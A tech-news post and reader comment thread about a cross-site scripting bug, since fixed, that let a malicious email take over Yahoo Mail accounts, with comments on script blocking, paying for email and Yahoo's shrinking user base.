Yahoo Fixes Bug That Could Compromise Email Accounts When Opening an Email

An anonymous reader writes: Yahoo! has fixed a cross-site scripting bug that would have allowed attackers to fully compromise email accounts just by sending a malicious email. To lose control over their accounts, victims needed only to open the email. The researcher who discovered the bug said, "The code would be automatically evaluated when the message was viewed. ... We provided Yahoo with a proof of concept email that would forward the victim user's inbox to an external website, and an email virus which infects the Yahoo Mail account and attaches itself to all outgoing emails. The bug was fixed before any known exploits 'in the wild.'" Yahoo!'s bounty program awarded $10,000 for the research.

Re:

[gstoddart]

I have one because of my ISP. I know people who have had their Yahoo address so long they keep it out of sheer inertia.

To me this comes down to the fundamental problem: why the hell do we keep trusting websites to run arbitrary scripts? And why the hell do we trust 3rd party scripts in web pages?

So some greedy bastard can give you an ad?

The average Yahoo user likely doesn't use script blockers, and isn't going to start out blocking them only to whitelist what they want.

I can barely convince my wife to ke

Pay for email

[Blaskowicz]

Like everyone everywhere is able to pay recurring fees for every little thing, yearly or monthly for decades on.

If you could get something like a lifetime subscription for mail at $100 I guess many would sign up (includes a choice of webmail like roundcube, squirrel etc.)
Perhaps $50, perhaps long term (20 years or delete after 5 years you didn't log in)

We're not only not willing to pay. Once you're paying for email, you have to keep paying (and have a valid debit card or banking account, etc.).
You may pay f

and we've had ads without scripts since forever

[raymorris]

Ads are how we've decided that web-based services are paid for, given the lack of convenient and efficient micro-payments. However, you don't need scripts to have ads. Static images or even text work just fine. Hell, ads printed in ink on paper have paid for newspapers for a hundred years or more. So to whatever extent ads are needed to pay for "free" web sites, that does NOT imply that third-party scripts are required.

Re:

[ShaunC]

They still are; my ancient @bellsouth.net email address was migrated to the att.yahoo.com interface a few years ago.

Re:

[Irate Engineer]

I got a Yahoo email when they first came out, before Gmail was a thing. It makes a great honeypot email address for websites that need a legit email to work (FYI - My corresponding name is John Doe and I live at 123 Fuckoff St., Anywhere, Zimbabwe). I sure as hell don't bother logging in to open or read anything in there - I'm sure there is crap in there that would make Goatse look suitable for the cover of a mother's day card. When (not if) Yahoo finally gasps its last and dies, I'll be sad for the whole

Re:Why bother?

[Rob MacDonald]

Because not all of the skilled and talented people out there are asshats willing to sell out security to make a quick buck?

Re:

[Anonymous Coward]

For one, the researcher is out of Finland, not the US.

Also, depends on where you work. Maybe you can bill yourself $200/hr in SF, but where I am, you'd be lucky to get $20/hr, and 500 hours could be 3 months depending on how many hours you work some places.

Re:

[kimvette]

For yahoo mail? really?
Why would blackhats buy an exploit for an email provider with a userbase of 3?

Amount of people

[110010001000]

The number of people affected were 5 of the 11 people who still use Yahoo! mail.

Re:

[campuscodi]

Yahoo says they still have 300 million.

Re:

[110010001000]

I'm sure that is really accurate. Margin of error is 99.99999%

Re:

[Penguinisto]

Prolly counting the spam-trap and inactive email accounts that folks have 'ginned up since it opened...

Now how am I going to get my ex-gfs nudes?

[raymorris]

This fix will make it harder to get my hot ex-gf's nudie pics.

Re:

[climb_no_fear]

Always make backups, preferably to an insecure cloud service.

POP/IMAP Affected Also?

[bughunter]

I take it you have to run a script in the email while reading it with the Yahoo web client open, so using a local client is safe. (I don't open mail from people I don't know anyway... and even then, scripts and images are disabled in my client.)

I was able to get myfirstname.mylastname@yahoo.com, so not only do I still use it, but I pay $20 annually for IMAP/SMTP access. I use Thunderbird or iOS Mail to read my mail and only rarely and occasionally use the web client to read mail.

However, their stupid secu

Re: POP/IMAP Affected Also?

[Woldscum]

How are they going to serve you adds?

Re:

[grim4593]

I just checked my Thunderbird settings and I use IMAP and SMTP access with my Yahoo account and I don't pay $20/year or log in monthly.

Re:

[bughunter]

Interesting. Thank you for that info.

Is that for a mobile device only or do you use a PC-based client?

Re:

[grim4593]

This is on a Windows 10 desktop using Thunderbird. I use my @yahoo.com email and password:
imap.mail.yahoo.com Port:933 SSL/TLS, normal password
smtp.mail.yahoo.com Port:465 SSL/TLS, normal password
My android phone uses the same settings.

Would the attack have worked with NoScript enabled

[iMadeGhostzilla]

... assuming only the yahoo domains were allowed?

Astounding

[JustAnotherOldGuy]

Yahoo, a multi-million, possibly billion dollar company can't secure their own goddamn webmail, and this is after having ~20 years of experience in being an email provider.

Fucking fabulous, great job guys, you da man.

Re:

[antdude]

It is not the same Y! as before. :/